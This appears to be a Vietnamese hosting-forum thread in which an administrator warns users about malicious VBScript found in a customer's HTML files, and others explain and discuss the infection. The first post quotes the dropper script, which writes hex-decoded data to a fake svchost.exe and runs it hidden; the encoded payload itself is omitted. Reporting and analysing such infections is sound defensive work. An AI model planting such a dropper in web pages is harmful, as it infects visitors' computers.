Hôm nay ngồi quét virus từng account trên rsl. Thì phát hiện cái này ở 1 account. Lập tức kiểm tra những file html đó thì nó chứa đoạn mã thế này. Mã: <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "Đoạn này đc mã hóa nên ko copy vào" " Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> Mình ko biết tác hại của nó như thế nào, nhưng khi mở file đó bằng trình duyệt thì trình virus báo teng teng =.= Mọi người nên cẩn thận nhé
Tác hại là tạo file Windows\System32\svchost.exe với nội dung bạn đã remove. Chắc dùng IE may ra dính.
Tưởng gì, virus này mình biết lâu roài mà Nó tự động bị chặn lại giống như chặn spyware ấy Nói chung không gây ảnh hưởng gì tới dữ liệu của máy tính cả, chỉ làm tốn thêm ít tài nguyên thôi
Bác bác, chừng nào em ra Đà lạt bác đón em dc ko P/s: Cái virus này là em rất sợ, máy em bị dính hàng là nó chạy lần trăm task svhost.exe
Khác nhau chứ Mà thôi, đưa cái diệt tự động lên nguy hiểm cho máy tính, lỡ nó quyét nhầm cái svhost của máy thì cài win lại luon Lên google tìm cái diệt thủ công cho an toàn, mất khoảng 15p.
Haizz. Tất nhiên là khác nhau rồi. svchost là file hệ thống của Windows. Từ xưa tới nay có cả trăm con virus dùng cái tên này hòng qua mặt người sử dụng có ít hiểu biết về thống. Chỉ khác là nó ở các thư mục khác nhau rồi.
Vâng ! Hôm qua mình đi quét từng user thì phát hiện có virus ở tên miền của bạn. Mình đã xóa và tạm ngưng host chờ bạn online giải quyết